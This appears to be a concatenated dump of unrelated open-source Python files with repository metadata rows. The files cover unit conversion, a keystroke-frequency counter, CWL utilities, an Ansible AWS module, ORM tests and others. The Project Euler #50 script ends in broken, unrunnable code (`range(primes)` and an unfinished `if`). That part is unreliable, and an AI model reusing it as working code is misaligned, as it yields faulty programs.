{'a': 'A2', 'b': 'B2', 'c': 'C2'},
{'a': 'A3', 'b': 'B3', 'c': 'C3'}
]
output = six.StringIO()
args = mock.Mock()
sf.add_argument_group(args)
sf.emit_list(c, d, output, args)
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
def test_formattablecolumn_list(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c')
d = (
('A1', 'B1', test_columns.FauxColumn(['the', 'value'])),
)
expected = [
{'a': 'A1', 'b': 'B1', 'c': ['the', 'value']},
]
args = mock.Mock()
sf.add_argument_group(args)
args.noindent = True
output = six.StringIO()
sf.emit_list(c, d, output, args)
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
| apache-2.0 | -9,176,197,613,891,788,000 | 29.58 | 76 | 0.519294 | false | 3.43982 | true | false | false |
orestkreminskyi/taf | utils/iperflexer/unitconverter.py | 2 | 10932 | """
Copyright (c) 2014 Russell Nakamura
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH
THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
class UnitNames(object):
"""
Unit Names is a namespace to hold units
"""
__slots__ = ()
# bits
bits = "bits"
kbits = "K" + bits
kilobits = kbits
mbits = "M" + bits
megabits = mbits
gbits = "G" + bits
gigabits = gbits
tbits = "T" + bits
terabits = tbits
pbits = "P" + bits
petabits = pbits
ebits = "E" + bits
exabits = ebits
zbits = "Z" + bits
zettabits = zbits
ybits = "Y" + bits
yottabits = ybits
# bytes
bytes = "Bytes"
kbytes = "K" + bytes
kilobytes = kbytes
mbytes = "M" + bytes
megabytes = mbytes
gbytes = "G" + bytes
gigabytes = gbytes
tbytes = "T" + bytes
terabytes = tbytes
pbytes = "P" + bytes
petabytes = pbytes
ebytes = "E" + bytes
exabytes = ebytes
zbytes = 'Z' + bytes
zettabytes = zbytes
ybytes = 'Y' + bytes
yottabytes = ybytes
class BinaryUnitNames(object):
"""
namespace for binary-unit names
"""
bits = UnitNames.bits
bibits = 'bi' + bits
kibibits = "ki" + bibits
mebibits = 'me' + bibits
gibibits = "gi" + bibits
tebibits = "te" + bibits
pebibits = "pe" + bibits
exbibits = "ex" + bibits
zebibits = "ze" + bibits
yobibits = "yo" + bibits
bytes = 'bytes'
bibytes = 'bi' + bytes
kibibytes = "ki" + bibytes
mebibytes = "me" + bibytes
gibibytes = 'gi' + bibytes
tebibytes = 'te' + bibytes
pebibytes = 'pe' + bibytes
exbibytes = "ex" + bibytes
zebibytes = "ze" + bibytes
yobibytes = "yo" + bibytes
# iperf base 2
iperf_bytes = UnitNames.bytes
iperf_kibibytes = UnitNames.kbytes
iperf_mebibytes = UnitNames.mbytes
iperf_gibibytes = UnitNames.gbytes
iperf_tebibytes = UnitNames.tbytes
iperf_pebibytes = UnitNames.pbytes
iperf_exbibytes = UnitNames.ebytes
iperf_zebibytes = UnitNames.zbytes
iperf_yobibytes = UnitNames.ybytes
# end BinaryUnitNames
IDENTITY = 1
ONE = 1.0
BYTE = 8
TO_BYTE = ONE/BYTE
class BaseConverter(dict):
"""
A creator of unit-conversion dictionaries
"""
def __init__(self, to_units, kilo_prefix):
"""
base_converter constructor
:param:
- `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes)
- `kilo_prefix`: kilo multiplier matching type of units
"""
self.to_units = to_units
self.kilo_prefix = kilo_prefix
self._prefix_conversions = None
self._bits_to_bytes = None
self._bytes_to_bits = None
# split the to_units list for later
self.bit_conversions = self.byte_conversions = len(to_units)//2
self.bit_units = to_units[:self.bit_conversions]
self.byte_units = to_units[self.byte_conversions:]
return
@property
def prefix_conversions(self):
"""
List of lists of prefix conversions
"""
if self._prefix_conversions is None:
# start with list that assumes value has no prefix
# this list is for 'bits' or 'bytes'
# the values will be 1, 1/kilo, 1/mega, etc.
start_list = [self.kilo_prefix**(-power)
for power in range(self.bit_conversions)]
self._prefix_conversions = self.conversions(conversion_factor=1,
start_list=start_list)
return self._prefix_conversions
@property
def bits_to_bytes(self):
"""
List of conversions for bits to bytes
"""
if self._bits_to_bytes is None:
self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)
return self._bits_to_bytes
@property
def bytes_to_bits(self):
"""
list of conversions for bytes to bits
"""
if self._bytes_to_bits is None:
self._bytes_to_bits = self.conversions(conversion_factor=BYTE)
return self._bytes_to_bits
def conversions(self, conversion_factor, start_list=None):
"""
Creates the converter-lists
:param:
- `conversion_factor`: multiplier for values (8 or 1/8, or 1)
- `start_list`: if given, use to start the conversion-list
:return: list of conversion_lists
"""
if start_list is None:
# assume that prefix_conversions exists (not safe, but...)
start_list = self.prefix_conversions[0]
# start with byte_factor times the base conversions (1, 1/kilo, etc.)
converter_list = [[conversion_factor * conversion
for conversion in start_list]]
for previous in range(self.bit_conversions - 1):
# 'pop' last item from previous list
# and prepend one higher-power conversion
next_conversions = ([self.kilo_prefix**(previous+1) * conversion_factor] +
converter_list[previous][:-1])
converter_list.append(next_conversions)
return converter_list
def build_conversions(self):
"""
builds the dictionary
"""
# from bits to bits or bytes
for index, units in enumerate(self.bit_units):
self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] +
self.bits_to_bytes[index])))
# from bytes to bits or bytes
for index, units in enumerate(self.byte_units):
self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] +
self.prefix_conversions[index])))
return
# end class BaseConverter
bit_units = [UnitNames.bits,
UnitNames.kbits,
UnitNames.mbits,
UnitNames.gbits,
UnitNames.terabits,
UnitNames.petabits,
UnitNames.exabits,
UnitNames.zettabits,
UnitNames.yottabits]
byte_units = [UnitNames.bytes,
UnitNames.kbytes,
UnitNames.mbytes,
UnitNames.gbytes,
UnitNames.terabytes,
UnitNames.petabytes,
UnitNames.exabytes,
UnitNames.zettabytes,
UnitNames.yottabytes]
decimal_to_units = bit_units + byte_units
KILO = 10**3
class UnitConverter(BaseConverter):
"""
The UnitConverter makes conversions based on a base-10 system
"""
def __init__(self):
super(UnitConverter, self).__init__(to_units=decimal_to_units,
kilo_prefix=KILO)
self.build_conversions()
return
# end class UnitConverter
DecimalUnitConverter = UnitConverter
to_bits = [BinaryUnitNames.bits,
BinaryUnitNames.kibibits,
BinaryUnitNames.mebibits,
BinaryUnitNames.gibibits,
BinaryUnitNames.tebibits,
BinaryUnitNames.pebibits,
BinaryUnitNames.exbibits,
BinaryUnitNames.zebibits,
BinaryUnitNames.yobibits]
to_bytes = [BinaryUnitNames.bytes,
BinaryUnitNames.kibibytes,
BinaryUnitNames.mebibytes,
BinaryUnitNames.gibibytes,
BinaryUnitNames.tebibytes,
BinaryUnitNames.pebibytes,
BinaryUnitNames.exbibytes,
BinaryUnitNames.zebibytes,
BinaryUnitNames.yobibytes]
binary_to_units = to_bits + to_bytes
KIBI = 2**10
class BinaryUnitconverter(BaseConverter):
"""
The BinaryUnitconverter is a conversion lookup table for binary data
Usage::
converted = old * UnitConverter[old units][new units]
Use class UnitNames to get valid unit names
"""
def __init__(self):
super(BinaryUnitconverter, self).__init__(to_units=binary_to_units,
kilo_prefix=KIBI)
self.build_conversions()
return
# end class BinaryUnitConverter
to_bits = [BinaryUnitNames.bits,
BinaryUnitNames.kibibits,
BinaryUnitNames.mebibits,
BinaryUnitNames.gibibits,
BinaryUnitNames.tebibits,
BinaryUnitNames.pebibits,
BinaryUnitNames.exbibits,
BinaryUnitNames.zebibits,
BinaryUnitNames.yobibits]
to_bytes = [BinaryUnitNames.iperf_bytes,
BinaryUnitNames.iperf_kibibytes,
BinaryUnitNames.iperf_mebibytes,
BinaryUnitNames.iperf_gibibytes,
BinaryUnitNames.iperf_tebibytes,
BinaryUnitNames.iperf_pebibytes,
BinaryUnitNames.iperf_exbibytes,
BinaryUnitNames.iperf_zebibytes,
BinaryUnitNames.iperf_yobibytes]
iperf_binary_to_units = to_bits + to_bytes
class IperfbinaryConverter(BaseConverter):
"""
The IperfbinaryConverter is a conversion lookup table for binary data
Usage::
converter = IperfbinaryConverter()
converted = old * converter[old units][new units]
Use class UnitNames to get valid unit names
"""
def __init__(self):
super(IperfbinaryConverter, self).__init__(to_units=iperf_binary_to_units,
kilo_prefix=KIBI)
self.build_conversions()
return
# end class BinaryUnitConverter
if __name__ == "__builtin__":
unit_converter = UnitConverter()
bits = 10**6
converted = bits * unit_converter['bits']['Mbits']
print("{0} Mbits".format(converted))
if __name__ == "__builtin__":
binary_converter = BinaryUnitconverter()
MBytes = 1
bits = MBytes * binary_converter[BinaryUnitNames.mebibytes][UnitNames.bits]
print("{0:,} bits".format(bits))
if __name__ == '__builtin__':
mbits = bits * unit_converter[UnitNames.bits][UnitNames.mbits]
print('{0} Mbits'.format(mbits))
| apache-2.0 | 8,128,448,898,096,653,000 | 29.707865 | 97 | 0.607757 | false | 3.797152 | false | false | false |
Titan-C/helpful_scripts | pyutils/keystats.py | 1 | 1455 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""
Follow statistics of my keystrokes
==================================
"""
# Created Wed Sep 16 18:40:15 2015
# Author: Óscar Nájera
from __future__ import division, absolute_import, print_function
import re
import os
import collections
import argparse
parser = argparse.ArgumentParser(description='Key press statistics')
parser.add_argument('-file', default=os.path.expanduser('~/keylog'),
help='Key pressing log file')
parser.add_argument('-txt', action='store_true',
help='is it a text file?')
parser.add_argument('-chr', action='store_true',
help='Count the shift chording ')
arguments = parser.parse_args()
with open(arguments.file, 'r') as keyshom:
data = keyshom.read()
if not arguments.txt:
kdata = re.findall(r'KeyPress.*?\[(\w+)\]', data)
if arguments.chr:
print('yo')
kdata = re.findall(r'KeyPress.*?\[(\w+)\].*?\[Shift.*?\]', data)
collstat = collections.Counter(kdata)
print('Most typed characters')
for i, (char, count) in enumerate(collstat.most_common()):
print(i, char, count)
if arguments.txt:
pair_data = re.findall(r'(\w.)', kdata) + re.findall(r'(.\w)', kdata)
else:
pair_data = list(zip(kdata[:-1], kdata[1:]))
pair_stat = collections.Counter(pair_data)
print('Most recurrent key successions')
for i, (pair, count) in enumerate(pair_stat.most_common(50)):
print(i, pair, count)
| gpl-2.0 | 999,833,351,648,647,800 | 27.490196 | 73 | 0.638679 | false | 3.27991 | false | false | false |
AustinHartman/randomPrograms | euler50.py | 1 | 1672 | import math
import time
def prime_list(lower, upper):
p_ls = [2, 3, 5, 7]
for n in range(lower, upper, 2):
p = True
for d in range(3, int(math.sqrt(n)) + 1):
if n % d == 0:
p = False
break
if p:
p_ls.append(n)
return p_ls
def is_prime(x):
if x % 2 == 0:
return False
d = 3
upper = int(abs(x) ** 0.5 + 1)
while d <= upper:
if x % d == 0:
return False
d += 2
return True
def prime_generator():
num = 5
while True:
prime = True
for d in range(3, int(num ** 0.5 + 1)):
if num % d == 0:
prime = False
break
if prime:
yield num
num += 2
start = time.time()
gen = prime_generator()
primes = [2, 3]
n = 5
longest = 0
total = 0
length = 0
prime = 0
keep_checking_num = True
l = 0
while n < 1000001:
if not is_prime(n):
n += 2
continue
while primes[-1] < n:
primes.append(gen.__next__())
keep_checking_num = True
l = 0
while keep_checking_num:
l += 1
length = 0
total = 0
for i in range(l, len(primes)):
total += primes[i]
length += 1
if total > n:
break
if total == n:
if length > longest:
longest = length
prime = n
print(prime)
keep_checking_num = False
n += 2
print(longest, prime)
print(time.time()-start)
for i in range(primes):
for n in range(primes):
if sum(primes)
| gpl-3.0 | -2,495,375,094,756,850,700 | 17.786517 | 49 | 0.44378 | false | 3.557447 | false | false | false |
dleehr/cwltool | cwltool/utils.py | 1 | 8161 | """Shared functions and other definitions."""
from __future__ import absolute_import
import collections
import os
import platform
import random
import shutil
import string
import sys
import tempfile
from functools import partial # pylint: disable=unused-import
from typing import (IO, Any, AnyStr, Callable, # pylint: disable=unused-import
Dict, Iterable, List, MutableMapping, MutableSequence,
Optional, Union)
import pkg_resources
from mypy_extensions import TypedDict
from schema_salad.utils import json_dump, json_dumps # pylint: disable=unused-import
from six.moves import urllib, zip_longest
from typing_extensions import Deque, Text # pylint: disable=unused-import
# move to a regular typing import when Python 3.3-3.6 is no longer supported
# no imports from cwltool allowed
if os.name == 'posix':
if sys.version_info < (3, 5):
import subprocess32 as subprocess # pylint: disable=unused-import
else:
import subprocess # pylint: disable=unused-import
else:
import subprocess # type: ignore
windows_default_container_id = "frolvlad/alpine-bash"
Directory = TypedDict('Directory',
{'class': Text, 'listing': List[Dict[Text, Text]],
'basename': Text})
DEFAULT_TMP_PREFIX = tempfile.gettempdir() + os.path.sep
processes_to_kill = collections.deque() # type: Deque[subprocess.Popen]
def versionstring():
# type: () -> Text
'''
version of CWLtool used to execute the workflow.
'''
pkg = pkg_resources.require("cwltool")
if pkg:
return u"%s %s" % (sys.argv[0], pkg[0].version)
return u"%s %s" % (sys.argv[0], "unknown version")
def aslist(l): # type: (Any) -> MutableSequence[Any]
"""Wraps any non-MutableSequence/list in a list."""
if isinstance(l, MutableSequence):
return l
return [l]
def copytree_with_merge(src, dst): # type: (Text, Text) -> None
if not os.path.exists(dst):
os.makedirs(dst)
shutil.copystat(src, dst)
lst = os.listdir(src)
for item in lst:
spath = os.path.join(src, item)
dpath = os.path.join(dst, item)
if os.path.isdir(spath):
copytree_with_merge(spath, dpath)
else:
shutil.copy2(spath, dpath)
def docker_windows_path_adjust(path):
# type: (Optional[Text]) -> Optional[Text]
r"""
Changes only windows paths so that the can be appropriately passed to the
docker run command as as docker treats them as unix paths.
Example: 'C:\Users\foo to /C/Users/foo (Docker for Windows) or /c/Users/foo
(Docker toolbox).
"""
if path is not None and onWindows():
split = path.split(':')
if len(split) == 2:
if platform.win32_ver()[0] in ('7', '8'): # type: ignore
split[0] = split[0].lower() # Docker toolbox uses lowecase windows Drive letters
else:
split[0] = split[0].capitalize()
# Docker for Windows uses uppercase windows Drive letters
path = ':'.join(split)
path = path.replace(':', '').replace('\\', '/')
return path if path[0] == '/' else '/' + path
return path
def docker_windows_reverse_path_adjust(path):
# type: (Text) -> (Text)
r"""
Change docker path (only on windows os) appropriately back to Window path/
Example: /C/Users/foo to C:\Users\foo
"""
if path is not None and onWindows():
if path[0] == '/':
path = path[1:]
else:
raise ValueError("not a docker path")
splitpath = path.split('/')
splitpath[0] = splitpath[0]+':'
return '\\'.join(splitpath)
return path
def docker_windows_reverse_fileuri_adjust(fileuri):
# type: (Text) -> (Text)
r"""
On docker in windows fileuri do not contain : in path
To convert this file uri to windows compatible add : after drive letter,
so file:///E/var becomes file:///E:/var
"""
if fileuri is not None and onWindows():
if urllib.parse.urlsplit(fileuri).scheme == "file":
filesplit = fileuri.split("/")
if filesplit[3][-1] != ':':
filesplit[3] = filesplit[3]+':'
return '/'.join(filesplit)
return fileuri
raise ValueError("not a file URI")
return fileuri
def onWindows():
# type: () -> (bool)
""" Check if we are on Windows OS. """
return os.name == 'nt'
def convert_pathsep_to_unix(path): # type: (Text) -> (Text)
"""
On windows os.path.join would use backslash to join path, since we would
use these paths in Docker we would convert it to use forward slashes: /
"""
if path is not None and onWindows():
return path.replace('\\', '/')
return path
def cmp_like_py2(dict1, dict2): # type: (Dict[Text, Any], Dict[Text, Any]) -> int
"""
Comparision function to be used in sorting as python3 doesn't allow sorting
of different types like str() and int().
This function re-creates sorting nature in py2 of heterogeneous list of
`int` and `str`
"""
# extract lists from both dicts
first, second = dict1["position"], dict2["position"]
# iterate through both list till max of their size
for i, j in zip_longest(first, second):
if i == j:
continue
# in case 1st list is smaller
# should come first in sorting
if i is None:
return -1
# if 1st list is longer,
# it should come later in sort
elif j is None:
return 1
# if either of the list contains str element
# at any index, both should be str before comparing
if isinstance(i, str) or isinstance(j, str):
return 1 if str(i) > str(j) else -1
# int comparison otherwise
return 1 if i > j else -1
# if both lists are equal
return 0
def bytes2str_in_dicts(inp # type: Union[MutableMapping[Text, Any], MutableSequence[Any], Any]
):
# type: (...) -> Union[Text, MutableSequence[Any], MutableMapping[Text, Any]]
"""
Convert any present byte string to unicode string, inplace.
input is a dict of nested dicts and lists
"""
# if input is dict, recursively call for each value
if isinstance(inp, MutableMapping):
for k in inp:
inp[k] = bytes2str_in_dicts(inp[k])
return inp
# if list, iterate through list and fn call
# for all its elements
if isinstance(inp, MutableSequence):
for idx, value in enumerate(inp):
inp[idx] = bytes2str_in_dicts(value)
return inp
# if value is bytes, return decoded string,
elif isinstance(inp, bytes):
return inp.decode('utf-8')
# simply return elements itself
return inp
def visit_class(rec, cls, op):
# type: (Any, Iterable, Union[Callable[..., Any], partial[Any]]) -> None
"""Apply a function to with "class" in cls."""
if isinstance(rec, MutableMapping):
if "class" in rec and rec.get("class") in cls:
op(rec)
for d in rec:
visit_class(rec[d], cls, op)
if isinstance(rec, MutableSequence):
for d in rec:
visit_class(d, cls, op)
def visit_field(rec, field, op):
# type: (Any, Iterable, Union[Callable[..., Any], partial[Any]]) -> None
"""Apply a function to mapping with 'field'."""
if isinstance(rec, MutableMapping):
if field in rec:
rec[field] = op(rec[field])
for d in rec:
visit_field(rec[d], field, op)
if isinstance(rec, MutableSequence):
for d in rec:
visit_field(d, field, op)
def random_outdir(): # type: () -> Text
""" Return the random directory name chosen to use for tool / workflow output """
# compute this once and store it as a function attribute - each subsequent call will return the same value
if not hasattr(random_outdir, 'outdir'):
random_outdir.outdir = '/' + ''.join([random.choice(string.ascii_letters) for _ in range(6)]) # type: ignore
return random_outdir.outdir # type: ignore
| apache-2.0 | -1,387,636,412,206,536,700 | 33.289916 | 117 | 0.610587 | false | 3.853163 | false | false | false |
madgik/exareme | Exareme-Docker/src/exareme/exareme-tools/madis/src/functionslocal/aggregate/linearregressionresultsviewer.py | 1 | 2533 | # class linearregressionresultsviewer:
# registered = True # Value to define db operator
#
# def __init__(self):
# self.n = 0
# self.mydata = dict()
# self.variablenames = []
#
# def step(self, *args):
# # if self.n == 0:
# # print args, len(args)
# # self.noofvariables = args[4]
# # self.noofclusters = args[5]
# try:
# self.variablenames.append(str(args[0]))
# self.mydata[(args[0])] = str(args[1]), str(args[2]), str(args[3]), str(args[4])
# self.n += 1
# # if self.n <= self.noofvariables :
# # self.variablenames.append(str(args[1]))
# except (ValueError, TypeError):
# raise
#
# def final(self):
# yield ('linearregressionresult',)
#
# myresult = "{\"resources\": [{\"name\": \"linear-regression\", \"profile\": \"tabular-data-resource\", \
# \"data\": [[\"variable\", \"estimate\", \"standard_error\", \"t-value\", \"p-value\"]"
# if len(self.variablenames) != 0:
# myresult += ","
# for i in xrange(len(self.variablenames)):
# myresult += "[\"" + str(self.variablenames[i]) + "\","
# # row=[]
# # row.append(self.variablenames[i])
# for j in xrange(4):
# myresult += "\"" + str(self.mydata[(self.variablenames[i])][j]) + "\""
# if j < 3:
# myresult += ","
# # row.append(self.mydata[(self.variablenames[i])][j])
# # myresult+= str(row)
# if i < len(self.variablenames) - 1:
# myresult += "],"
#
# if len(self.variablenames) != 0:
# myresult += "]"
#
# myresult += "],\"schema\": { \"fields\": [{\"name\": \"variable\", \"type\": \"string\"}, \
# {\"name\": \"estimate\", \"type\": \"number\"},{\"name\": \"standard_error\", \"type\": \"number\"}, \
# {\"name\": \"t-value\", \"type\": \"number\"}, {\"name\": \"p-value\", \"type\": \"string\"}] } }]}"
#
# yield (myresult,)
#
#
# if not ('.' in __name__):
# """
# This is needed to be able to test the function, put it at the end of every
# new function you create
# """
# import sys
# from functions import *
#
# testfunction()
# if __name__ == "__main__":
# reload(sys)
# sys.setdefaultencoding('utf-8')
# import doctest
#
# doctest.testmod()
| mit | 1,042,671,281,403,169,500 | 36.80597 | 122 | 0.459929 | false | 3.324147 | false | false | false |
dimid/ansible-modules-extras | cloud/amazon/ec2_vpc_igw.py | 15 | 4625 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc_igw
short_description: Manage an AWS VPC Internet gateway
description:
- Manage an AWS VPC Internet gateway
version_added: "2.0"
author: Robert Estelle (@erydo)
options:
vpc_id:
description:
- The VPC ID for the VPC in which to manage the Internet Gateway.
required: true
default: null
state:
description:
- Create or terminate the IGW
required: false
default: present
choices: [ 'present', 'absent' ]
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Ensure that the VPC has an Internet Gateway.
# The Internet Gateway ID is can be accessed via {{igw.gateway_id}} for use in setting up NATs etc.
ec2_vpc_igw:
vpc_id: vpc-abcdefgh
state: present
register: igw
'''
try:
import boto.ec2
import boto.vpc
from boto.exception import EC2ResponseError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
if __name__ != '__main__':
raise
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import AnsibleAWSError, connect_to_aws, ec2_argument_spec, get_aws_connection_info
class AnsibleIGWException(Exception):
pass
def ensure_igw_absent(vpc_conn, vpc_id, check_mode):
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc_id})
if not igws:
return {'changed': False}
if check_mode:
return {'changed': True}
for igw in igws:
try:
vpc_conn.detach_internet_gateway(igw.id, vpc_id)
vpc_conn.delete_internet_gateway(igw.id)
except EC2ResponseError as e:
raise AnsibleIGWException(
'Unable to delete Internet Gateway, error: {0}'.format(e))
return {'changed': True}
def ensure_igw_present(vpc_conn, vpc_id, check_mode):
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc_id})
if len(igws) > 1:
raise AnsibleIGWException(
'EC2 returned more than one Internet Gateway for VPC {0}, aborting'
.format(vpc_id))
if igws:
return {'changed': False, 'gateway_id': igws[0].id}
else:
if check_mode:
return {'changed': True, 'gateway_id': None}
try:
igw = vpc_conn.create_internet_gateway()
vpc_conn.attach_internet_gateway(igw.id, vpc_id)
return {'changed': True, 'gateway_id': igw.id}
except EC2ResponseError as e:
raise AnsibleIGWException(
'Unable to create Internet Gateway, error: {0}'.format(e))
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
vpc_id = dict(required=True),
state = dict(default='present', choices=['present', 'absent'])
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
if not HAS_BOTO:
module.fail_json(msg='boto is required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
vpc_id = module.params.get('vpc_id')
state = module.params.get('state', 'present')
try:
if state == 'present':
result = ensure_igw_present(connection, vpc_id, check_mode=module.check_mode)
elif state == 'absent':
result = ensure_igw_absent(connection, vpc_id, check_mode=module.check_mode)
except AnsibleIGWException as e:
module.fail_json(msg=str(e))
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -2,129,451,769,415,334,400 | 28.272152 | 112 | 0.646919 | false | 3.688198 | false | false | false |
kovernik/python_training_new | test/add_contact_to_group.py | 1 | 1071 | from model.contact import Contact
from model.group import Group
from fixture.orm import ORMFixture
import random
db = ORMFixture(host='127.0.0.1', name='addressbook', user='root', password='')
def test_add_contact_to_group(app):
old_groups = db.get_group_list()
if len(old_groups) == 0:
app.group.create(Group(name="New_group"))
groups = db.get_group_list()
group = random.choice(groups)
old_contacts_in_group = db.get_contacts_in_group(group)
if len(db.get_contact_list()) == 0 or len(db.get_contact_list()) == len(old_contacts_in_group):
app.contact.fill_new(Contact(firstname="NEWSContact"))
contacts = db.get_contacts_not_in_group(group)
contact = random.choice(contacts)
app.contact.add_contact_in_group(contact, group)
new_contact_in_group = db.get_contacts_in_group(group)
assert len(old_contacts_in_group) + 1 == len(new_contact_in_group)
old_contacts_in_group.append(contact)
assert sorted(old_contacts_in_group, key=Contact.id_or_max) == sorted(new_contact_in_group, key=Contact.id_or_max)
| apache-2.0 | 888,426,471,953,180,500 | 43.625 | 118 | 0.699346 | false | 3.095376 | false | false | false |
vialette/ultrastorage | ultrastorage/storagesystem/homogeneousstoragesystem.py | 1 | 4026 | # coding=utf-8
"""Homogeneous storage system.
.. moduleauthor:: Stéphane Vialette <[email protected]>
"""
from .storagesystem import StorageSystem
from .storagesystemsnapshotcontroller import SuspendedStorageSystemSnapshotController
from .storagesystemexception import StorageSystemException
class HomogeneousStorageSystem(StorageSystem):
# storage system type
TYPE = "homogeneous"
def __init__(self, capacity, cpu, transfer_time_manager, name=None):
"""Initialize this homogeneous storage system.
:param capacity: The capacity of each storage unit of this storage system.
:type capacity: Numeric.
:param cpu:The number of cpu of each storage unit of this storage system.
:type cpu: int.
"""
super(self.__class__, self).__init__(transfer_time_manager, name)
# capacity
if capacity <= 0:
raise StorageSystemException("non-positive capacity '{}'".format(capacity))
self._capacity = capacity
# cpu
if cpu <= 0:
raise StorageSystemException("non-positive cpu '{}'".format(cpu))
if not isinstance(cpu, int):
raise StorageSystemException("non-integer cpu '{}'".format(cpu))
self._cpu = cpu
@property
def capacity(self):
"""Return the capacity of each storage unit.
"""
return self._capacity
@property
def cpu(self):
"""Return the number of cpu of each storage unit.
"""
return self._cpu
def add_storage_unit(self, environment, storage_unit_name = None):
"""Add a new storage unit to this storage system.
"""
return super(self.__class__, self).add_storage_unit(environment, self.capacity, self.cpu, storage_unit_name)
def homogeneous_storage_system_builder(environment, number_of_storage_units, capacity, cpu, transfer_time_manager,
name=None,
storage_unit_names = None):
"""Convenient function to create an homogeneous storage system.
:param number_of_storage_units: The number of storage units to be created.
:type number_of_storage_units: int.
:param capacity: The capacity of each storage unit.
:type capacity: Numeric.
:param cpu: The number of cpu of each storag unit.
:type cpu: int.
:param name: An optional name for this storage system.
:type name: string.
:param storage_unit_names: An optional list of names for the storage units.
:type storage_unit_names: [string].
"""
# number of storage units
if not isinstance(number_of_storage_units, int):
raise StorageSystemException("non-integer number of storage units")
if number_of_storage_units < 0:
raise StorageSystemException("negative number of storage units")
# take care of storage unit names
if storage_unit_names is not None:
if len(storage_unit_names) != number_of_storage_units:
msg = "bad number of storage unit names, expected {} got {}".format(number_of_storage_units, len(storage_unit_names))
raise StorageSystemException(msg)
# create the storage system
homogeneous_storage_system = HomogeneousStorageSystem(capacity, cpu, transfer_time_manager, name)
# suspend the storage system snapshot controller while we are adding
# the storage units.
with SuspendedStorageSystemSnapshotController(homogeneous_storage_system):
# add the storage units to the storage system
for i in range(number_of_storage_units):
storage_unit_name = None
if storage_unit_names is not None:
storage_unit_name = storage_unit_names[i]
homogeneous_storage_system.add_storage_unit(environment, storage_unit_name)
# let the snapshot controller know about the new storage units
homogeneous_storage_system.force_snapshot(environment)
# return back to the caller the new storage system
return homogeneous_storage_system
| mit | 7,335,059,450,182,258,000 | 36.971698 | 129 | 0.668571 | false | 4.394105 | false | false | false |
compas-dev/compas | src/compas_ghpython/artists/__init__.py | 1 | 1774 | """
********************************************************************************
artists
********************************************************************************
.. currentmodule:: compas_ghpython.artists
.. rst-class:: lead
Artists for visualising (painting) COMPAS objects with GHPython.
Artists convert COMPAS objects to Rhino geometry and data.
.. code-block:: python
pass
----
Geometry Artists
================
.. autosummary::
:toctree: generated/
:nosignatures:
CircleArtist
FrameArtist
LineArtist
PointArtist
PolylineArtist
Datastructure Artists
=====================
.. autosummary::
:toctree: generated/
:nosignatures:
MeshArtist
NetworkArtist
VolMeshArtist
Robot Artist
============
.. autosummary::
:toctree: generated/
:nosignatures:
RobotModelArtist
Base Classes
============
.. autosummary::
:toctree: generated/
:nosignatures:
BaseArtist
PrimitiveArtist
ShapeArtist
"""
from __future__ import absolute_import
from ._artist import BaseArtist
from ._primitiveartist import PrimitiveArtist
from ._shapeartist import ShapeArtist
from .circleartist import CircleArtist
from .frameartist import FrameArtist
from .lineartist import LineArtist
from .pointartist import PointArtist
from .polylineartist import PolylineArtist
from .meshartist import MeshArtist
from .networkartist import NetworkArtist
from .volmeshartist import VolMeshArtist
from .robotmodelartist import RobotModelArtist
__all__ = [
'BaseArtist',
'PrimitiveArtist',
'ShapeArtist',
'CircleArtist',
'FrameArtist',
'LineArtist',
'PointArtist',
'PolylineArtist',
'MeshArtist',
'NetworkArtist',
'VolMeshArtist',
'RobotModelArtist'
]
| mit | -7,449,057,773,028,017,000 | 17.102041 | 80 | 0.631905 | false | 4.23389 | false | false | false |
emacsway/ascetic | ascetic/tests/test_relations.py | 1 | 4696 | import unittest
from ascetic import validators
from ascetic.databases import databases
from ascetic.models import Model
from ascetic.relations import ForeignKey
Author = Book = None
class TestCompositeRelation(unittest.TestCase):
maxDiff = None
create_sql = {
'postgresql': """
DROP TABLE IF EXISTS ascetic_composite_author CASCADE;
